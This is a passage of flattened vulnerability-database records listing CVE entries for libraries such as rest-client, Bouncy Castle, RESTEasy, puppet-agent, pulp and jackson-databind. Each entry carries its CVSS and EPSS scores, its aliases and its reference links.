scoring_system cvssv3
scoring_elements
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rest-client/rest-client/issues/369
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2015-1820
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2015-1820
7
reference_url https://rubygems.org/gems/rest-client/versions/1.6.1.a
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://rubygems.org/gems/rest-client/versions/1.6.1.a
8
reference_url https://web.archive.org/web/20200228080106/http://www.securityfocus.com/bid/73295
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200228080106/http://www.securityfocus.com/bid/73295
9
reference_url http://www.openwall.com/lists/oss-security/2015/03/24/3
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2015/03/24/3
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=781238
reference_id 781238
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=781238
11
reference_url https://github.com/advisories/GHSA-3fhf-6939-qg8p
reference_id GHSA-3fhf-6939-qg8p
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3fhf-6939-qg8p
12
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2015-1820, GHSA-3fhf-6939-qg8p, OSV-119878
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vhdm-w6p1-uuh9
76
url VCID-w543-qxxs-f7g7
vulnerability_id VCID-w543-qxxs-f7g7
summary The default BKS keystore use an HMAC that is only 16 bits long, which can allow an attacker to compromise the integrity of a BKS keystore. Bouncy Castle release 1.47 changes the BKS format to a format which uses a 160 bit HMAC instead. This applies to any BKS keystore generated prior to BC 1.47. For situations where people need to create the files for legacy reasons a specific keystore type "BKS-V1" was introduced in 1.49. It should be noted that the use of "BKS-V1" is discouraged by the library authors and should only be used where it is otherwise safe to do so, as in where the use of a 16 bit checksum for the file integrity check is not going to cause a security issue in itself.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-5382.json
reference_id
reference_type
scores
0
value 5.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-5382.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-5382
reference_id
reference_type
scores
0
value 0.00153
scoring_system epss
scoring_elements 0.36017
published_at 2026-04-09T12:55:00Z
1
value 0.00153
scoring_system epss
scoring_elements 0.3596
published_at 2026-04-13T12:55:00Z
2
value 0.00153
scoring_system epss
scoring_elements 0.35986
published_at 2026-04-12T12:55:00Z
3
value 0.00153
scoring_system epss
scoring_elements 0.35889
published_at 2026-04-01T12:55:00Z
4
value 0.00153
scoring_system epss
scoring_elements 0.3608
published_at 2026-04-02T12:55:00Z
5
value 0.00153
scoring_system epss
scoring_elements 0.36109
published_at 2026-04-04T12:55:00Z
6
value 0.00153
scoring_system epss
scoring_elements 0.35945
published_at 2026-04-07T12:55:00Z
7
value 0.00153
scoring_system epss
scoring_elements 0.35995
published_at 2026-04-08T12:55:00Z
8
value 0.00153
scoring_system epss
scoring_elements 0.36024
published_at 2026-04-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-5382
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5382
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5382
4
reference_url https://github.com/bcgit/bc-java/commit/81b00861cd5711e85fe8dce2a0e119f684120255
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/81b00861cd5711e85fe8dce2a0e119f684120255
5
reference_url https://www.bouncycastle.org/releasenotes.html
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.bouncycastle.org/releasenotes.html
6
reference_url https://www.kb.cert.org/vuls/id/306792
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.kb.cert.org/vuls/id/306792
7
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
8
reference_url http://www.securityfocus.com/bid/103453
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.securityfocus.com/bid/103453
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1563749
reference_id 1563749
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1563749
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-5382
reference_id CVE-2018-5382
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-5382
11
reference_url https://github.com/advisories/GHSA-8477-3v39-ggpm
reference_id GHSA-8477-3v39-ggpm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8477-3v39-ggpm
fixed_packages
aliases CVE-2018-5382, GHSA-8477-3v39-ggpm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w543-qxxs-f7g7
77
url VCID-wbgc-tuj3-47by
vulnerability_id VCID-wbgc-tuj3-47by
summary 
Uncontrolled Resource Consumption
RESTEasy enables `GZIPInterceptor`, which allows remote attackers to cause a denial of service via unspecified vectors.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-6346.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-6346.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-6346
reference_id
reference_type
scores
0
value 0.01184
scoring_system epss
scoring_elements 0.78775
published_at 2026-04-13T12:55:00Z
1
value 0.01184
scoring_system epss
scoring_elements 0.78784
published_at 2026-04-12T12:55:00Z
2
value 0.01184
scoring_system epss
scoring_elements 0.78801
published_at 2026-04-11T12:55:00Z
3
value 0.01184
scoring_system epss
scoring_elements 0.78778
published_at 2026-04-09T12:55:00Z
4
value 0.01184
scoring_system epss
scoring_elements 0.78731
published_at 2026-04-02T12:55:00Z
5
value 0.01184
scoring_system epss
scoring_elements 0.78771
published_at 2026-04-08T12:55:00Z
6
value 0.01184
scoring_system epss
scoring_elements 0.78745
published_at 2026-04-07T12:55:00Z
7
value 0.01184
scoring_system epss
scoring_elements 0.78763
published_at 2026-04-04T12:55:00Z
8
value 0.01184
scoring_system epss
scoring_elements 0.78724
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-6346
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1372120
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1372120
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6346
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6346
4
reference_url https://github.com/resteasy/Resteasy
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/resteasy/Resteasy
5
reference_url https://github.com/resteasy/resteasy/pull/1303
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/resteasy/resteasy/pull/1303
6
reference_url https://issues.jboss.org/browse/JBEAP-11180
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://issues.jboss.org/browse/JBEAP-11180
7
reference_url http://www.securityfocus.com/bid/92744
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://www.securityfocus.com/bid/92744
8
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=837170
reference_id 837170
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=837170
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-6346
reference_id CVE-2016-6346
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-6346
10
reference_url https://github.com/advisories/GHSA-wxvr-vqfp-9cqw
reference_id GHSA-wxvr-vqfp-9cqw
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wxvr-vqfp-9cqw
11
reference_url https://access.redhat.com/errata/RHSA-2017:0517
reference_id RHSA-2017:0517
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:0517
12
reference_url https://access.redhat.com/errata/RHSA-2017:0826
reference_id RHSA-2017:0826
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:0826
13
reference_url https://access.redhat.com/errata/RHSA-2017:0827
reference_id RHSA-2017:0827
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:0827
14
reference_url https://access.redhat.com/errata/RHSA-2017:0828
reference_id RHSA-2017:0828
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:0828
15
reference_url https://access.redhat.com/errata/RHSA-2017:0829
reference_id RHSA-2017:0829
reference_type
scores
url https://access.redhat.com/errata/RHSA-2017:0829
16
reference_url https://usn.ubuntu.com/7630-1/
reference_id USN-7630-1
reference_type
scores
url https://usn.ubuntu.com/7630-1/
fixed_packages
aliases CVE-2016-6346, GHSA-wxvr-vqfp-9cqw
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wbgc-tuj3-47by
78
url VCID-wnjy-ggeb-eqcn
vulnerability_id VCID-wnjy-ggeb-eqcn
summary puppet: Environment leakage in puppet-agent
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-10690.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-10690.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10690
reference_id
reference_type
scores
0
value 0.00193
scoring_system epss
scoring_elements 0.41184
published_at 2026-04-01T12:55:00Z
1
value 0.00193
scoring_system epss
scoring_elements 0.41277
published_at 2026-04-02T12:55:00Z
2
value 0.00193
scoring_system epss
scoring_elements 0.41306
published_at 2026-04-04T12:55:00Z
3
value 0.00193
scoring_system epss
scoring_elements 0.4123
published_at 2026-04-07T12:55:00Z
4
value 0.00193
scoring_system epss
scoring_elements 0.41281
published_at 2026-04-08T12:55:00Z
5
value 0.00193
scoring_system epss
scoring_elements 0.41288
published_at 2026-04-09T12:55:00Z
6
value 0.00193
scoring_system epss
scoring_elements 0.4131
published_at 2026-04-11T12:55:00Z
7
value 0.00193
scoring_system epss
scoring_elements 0.41278
published_at 2026-04-12T12:55:00Z
8
value 0.00193
scoring_system epss
scoring_elements 0.41264
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10690
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1566764
reference_id 1566764
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1566764
fixed_packages
aliases CVE-2017-10690
risk_score 3.0
exploitability 0.5
weighted_severity 5.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wnjy-ggeb-eqcn
79
url VCID-wucb-ckae-97aq
vulnerability_id VCID-wucb-ckae-97aq
summary 
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
pulp 2.16.x and possibly older is vulnerable to an improper path parsing. A malicious user or a malicious iso feed repository can write to locations accessible to the 'apache' user. This may lead to overwrite of published content on other iso repositories.
references
0
reference_url https://access.redhat.com/errata/RHEA-2019:1283
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHEA-2019:1283
1
reference_url https://access.redhat.com/errata/RHSA-2019:1222
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1222
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-10917.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-10917.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-10917
reference_id
reference_type
scores
0
value 0.00271
scoring_system epss
scoring_elements 0.50564
published_at 2026-04-09T12:55:00Z
1
value 0.00271
scoring_system epss
scoring_elements 0.50568
published_at 2026-04-13T12:55:00Z
2
value 0.00271
scoring_system epss
scoring_elements 0.50559
published_at 2026-04-04T12:55:00Z
3
value 0.00271
scoring_system epss
scoring_elements 0.50512
published_at 2026-04-07T12:55:00Z
4
value 0.00271
scoring_system epss
scoring_elements 0.50567
published_at 2026-04-08T12:55:00Z
5
value 0.00271
scoring_system epss
scoring_elements 0.50583
published_at 2026-04-12T12:55:00Z
6
value 0.00271
scoring_system epss
scoring_elements 0.50475
published_at 2026-04-01T12:55:00Z
7
value 0.00271
scoring_system epss
scoring_elements 0.50532
published_at 2026-04-02T12:55:00Z
8
value 0.00271
scoring_system epss
scoring_elements 0.50606
published_at 2026-04-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-10917
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1598928
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1598928
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10917
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10917
6
reference_url https://access.redhat.com/security/cve/CVE-2018-10917
reference_id CVE-2018-10917
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2018-10917
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-10917
reference_id CVE-2018-10917
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-10917
8
reference_url https://github.com/advisories/GHSA-574p-6fw4-4hw8
reference_id GHSA-574p-6fw4-4hw8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-574p-6fw4-4hw8
fixed_packages
aliases CVE-2018-10917, GHSA-574p-6fw4-4hw8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wucb-ckae-97aq
80
url VCID-xnyb-nuwm-pkdr
vulnerability_id VCID-xnyb-nuwm-pkdr
summary 
Deserialization of Untrusted Data in jackson-databind
FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8840.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8840.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8840
reference_id
reference_type
scores
0
value 0.08164
scoring_system epss
scoring_elements 0.92187
published_at 2026-04-13T12:55:00Z
1
value 0.08164
scoring_system epss
scoring_elements 0.92191
published_at 2026-04-12T12:55:00Z
2
value 0.08164
scoring_system epss
scoring_elements 0.9219
published_at 2026-04-11T12:55:00Z
3
value 0.08164
scoring_system epss
scoring_elements 0.92154
published_at 2026-04-01T12:55:00Z
4
value 0.08164
scoring_system epss
scoring_elements 0.92185
published_at 2026-04-09T12:55:00Z
5
value 0.08164
scoring_system epss
scoring_elements 0.92182
published_at 2026-04-08T12:55:00Z
6
value 0.08164
scoring_system epss
scoring_elements 0.92171
published_at 2026-04-07T12:55:00Z
7
value 0.08164
scoring_system epss
scoring_elements 0.92167
published_at 2026-04-04T12:55:00Z
8
value 0.08164
scoring_system epss
scoring_elements 0.92161
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8840
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8840
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8840
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b
5
reference_url https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
6
reference_url https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f
7
reference_url https://github.com/FasterXML/jackson-databind/issues/2620
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2620
8
reference_url https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E
12
reference_url https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E
14
reference_url https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E
15
reference_url https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E
16
reference_url https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E
17
reference_url https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E
18
reference_url https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E
19
reference_url https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E
21
reference_url https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
